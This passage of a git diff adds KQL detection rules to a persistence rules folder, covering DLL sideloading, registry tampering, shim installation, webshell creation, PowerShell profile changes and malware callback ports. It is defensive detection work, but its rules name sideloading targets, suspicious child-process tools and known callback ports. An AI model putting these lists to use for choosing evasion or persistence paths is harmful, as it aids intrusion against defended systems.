Registry Activity +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: high +// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\firm\\soft\\Name" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql new file mode 100644 index 00000000..57dcb81d --- /dev/null +++ b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential Rcdll.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-03-13 +// Level: high +// Description: Detects potential DLL sideloading of rcdll.dll +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql new file mode 100644 index 00000000..59111e2b --- /dev/null +++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql @@ -0,0 +1,10 @@ +// Title: Potential RjvPlatform.DLL Sideloading From Default Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: medium +// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql new file mode 100644 index 00000000..be764d08 --- /dev/null +++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql @@ -0,0 +1,12 @@ +// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: high +// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql new file mode 100644 index 00000000..88e63fc1 --- /dev/null +++ b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential RoboForm.DLL Sideloading +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-14 +// Level: medium +// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation + +DeviceImageLoadEvents +| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql new file mode 100644 index 00000000..647717f9 --- /dev/null +++ b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql @@ -0,0 +1,10 @@ +// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-06 +// Level: medium +// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents +| where RegistryKey endswith "\\shell\\SentinelOneScan\\command*" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent"))))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql new file mode 100644 index 00000000..7211edc2 --- /dev/null +++ b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential ShellDispatch.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: medium +// Description: Detects potential DLL sideloading of "ShellDispatch.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Some installers may trigger some false positives + +DeviceImageLoadEvents +| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql new file mode 100644 index 00000000..6f4c3d7e --- /dev/null +++ b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Shim Database Persistence via Sdbinst.EXE +// Author: Markus Neis +// Date: 2019-01-16 +// Level: medium +// Description: Detects installation of a new shim using sdbinst.exe. +Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql new file mode 100644 index 00000000..ce441f53 --- /dev/null +++ b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential SmadHook.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-01 +// Level: high +// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql new file mode 100644 index 00000000..b60ddd2d --- /dev/null +++ b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential SolidPDFCreator.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-07 +// Level: medium +// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql new file mode 100644 index 00000000..ce854186 --- /dev/null +++ b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql @@ -0,0 +1,12 @@ +// Title: Potential Suspicious PowerShell Module File Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: medium +// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production. + +DeviceFileEvents +| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql new file mode 100644 index 00000000..34910143 --- /dev/null +++ b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Suspicious Registry File Imported Via Reg.EXE +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-01 +// Level: medium +// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion +// False Positives: +// - Legitimate import of keys + +DeviceProcessEvents +| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql new file mode 100644 index 00000000..4c732da6 --- /dev/null +++ b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE +// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport +// Date: 2022-02-12 +// Level: high +// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql new file mode 100644 index 00000000..724c5d35 --- /dev/null +++ b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential Vivaldi_elf.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential DLL sideloading of "vivaldi_elf.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql new file mode 100644 index 00000000..4c5051ad --- /dev/null +++ b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential Waveedit.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-14 +// Level: high +// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql new file mode 100644 index 00000000..3edd1ca6 --- /dev/null +++ b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql @@ -0,0 +1,12 @@ +// Title: Potential Webshell Creation On Static Website +// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo +// Date: 2019-10-22 +// Level: medium +// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 +// False Positives: +// - Legitimate administrator or developer creating legitimate executable files in a web application folder + +DeviceFileEvents +| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql new file mode 100644 index 00000000..0c027af5 --- /dev/null +++ b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential WWlib.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-18 +// Level: medium +// Description: Detects potential DLL sideloading of "wwlib.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql new file mode 100644 index 00000000..d746f12d --- /dev/null +++ b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Child Process of KeyScrambler.exe +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-05-13 +// Level: medium +// Description: Detects potentially suspicious child processes of KeyScrambler.exe +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql new file mode 100644 index 00000000..0a3db4bb --- /dev/null +++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql @@ -0,0 +1,14 @@ +// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE +// Author: Stephen Lincoln @slincoln-aiq (AttackIQ) +// Date: 2023-12-21 +// Level: medium +// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. +This is a common technique used by malware to change the desktop background to a ransom note or other image. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 +// False Positives: +// - Administrative scripts that change the desktop background to a company logo or other image. + +DeviceProcessEvents +| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql new file mode 100644 index 00000000..3620513c --- /dev/null +++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql @@ -0,0 +1,14 @@ +// Title: Potentially Suspicious Desktop Background Change Via Registry +// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ) +// Date: 2023-12-21 +// Level: medium +// Description: Detects registry value settings that would replace the user's desktop background. +This is a common technique used by malware to change the desktop background to a ransom note or other image. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 +// False Positives: +// - Administrative scripts that change the desktop background to a company logo or other image. + +DeviceRegistryEvents +| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(((RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper") or InitiatingProcessFolderPath endswith "C:\\Windows\\Explorer.EXE" or InitiatingProcessFolderPath endswith "\\svchost.exe"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe", "C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe")) and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql new file mode 100644 index 00000000..613c08f2 --- /dev/null +++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql @@ -0,0 +1,11 @@ +// Title: Potentially Suspicious Malware Callback Communication +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents +| where (RemotePort in~ ("100", "198", "200", "243", "473", "666", "700", "743", "777", "1443", "1515", "1777", "1817", "1904", "1960", "2443", "2448", "3360", "3675", "3939", "4040", "4433", "4438", "4443", "4444", "4455", "5445", "5552", "5649", "6625", "7210", "7777", "8143", "8843", "9631", "9943", "10101", "12102", "12103", "12322", "13145", "13394", "13504", "13505", "13506", "13507", "14102", "14103", "14154", "49180", "65520", "65535")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql new file mode 100644 index 00000000..88a88ae5 --- /dev/null +++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql @@ -0,0 +1,11 @@ +// Title: Potentially Suspicious Malware Callback Communication - Linux +// Author: hasselj +// Date: 2024-05-10 +// Level: high +// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents +| where (RemotePort in~ ("888", "999", "2200", "2222", "4000", "4444", "6789", "8531", "50501", "51820")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql new file mode 100644 index 00000000..354f302d --- /dev/null +++ b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql @@ -0,0 +1,13 @@ +// Title: Potentially Suspicious Shell Script Creation in Profile Folder +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: low +// Description: Detects the creation of shell scripts under the "profile.d" path. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events. +// - Regular file creation during system update or software installation by the package manager + +DeviceFileEvents +| where FolderPath contains "/etc/profile.d/" and (FolderPath endswith ".csh" or FolderPath endswith ".sh") \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_module_file_created.kql b/KQL/rules/Persistence/powershell_module_file_created.kql new file mode 100644 index 00000000..9c246782 --- /dev/null +++ b/KQL/rules/Persistence/powershell_module_file_created.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Module File Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: low +// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Likely + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql new file mode 100644 index 00000000..5c33c3aa --- /dev/null +++ b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Module File Created By Non-PowerShell Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: medium +// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceFileEvents +| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_profile_modification.kql b/KQL/rules/Persistence/powershell_profile_modification.kql new file mode 100644 index 00000000..42f5f1c1 --- /dev/null +++ b/KQL/rules/Persistence/powershell_profile_modification.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Profile Modification +// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-24 +// Level: medium +// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013 +// False Positives: +// - System administrator creating Powershell profile manually + +DeviceFileEvents +| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1" \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql new file mode 100644 index 00000000..e12598f0 --- /dev/null +++ 